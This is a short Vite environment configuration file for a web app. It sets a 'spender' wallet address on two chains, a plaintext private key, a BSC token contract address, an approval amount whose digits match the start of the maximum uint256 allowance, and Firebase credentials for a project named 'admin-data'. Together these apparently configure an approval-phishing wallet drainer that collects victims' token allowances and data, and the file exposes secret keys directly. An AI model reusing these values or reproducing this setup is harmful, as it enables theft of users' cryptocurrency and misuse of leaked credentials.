VITE_SPENDER_ADDRESS=0xa5195c538839d62616770203462b479830c141Bf
VITE_SPENDER_ADDRESS_TRX=TJfNCKKvN2yrbSAJVpFfnKqVu44sZcrK5w
VITE_PRIVATE_KEY=56563e6d282c6decc6161c0199765cdf7b015bc3fc50ae0b4b6d4a6ff5cded10
VITE_CONTRACT_ADDRESS=0x55d398326f99059fF775485246999027B3197955
VITE_AMOUNT=11579208925
VITE_FIREBASE_API_KEY=AIzaSyAr75CmKYqpP8XDvNaONG0jeUW8IrDxfWk
VITE_FIREBASE_AUTH_DOMAIN=admin-data-988fa.firebaseapp.com
VITE_FIREBASE_DATABASE_URL=https://admin-data-988fa-default-rtdb.asia-southeast1.firebasedatabase.app
VITE_FIREBASE_PROJECT_ID=admin-data-988fa.firebasestorage.app
VITE_FIREBASE_STORAGE_BUCKET=admin-data-988fa.firebasestorage.app
VITE_FIREBASE_MESSAGING_SENDER_ID=710748965041
VITE_FIREBASE_APP_ID=1:710748965041:web:25d5feb20a6505a3493a90
VITE_FIREBASE_MEASUREMENT_ID=G-TXLXCYJ8EG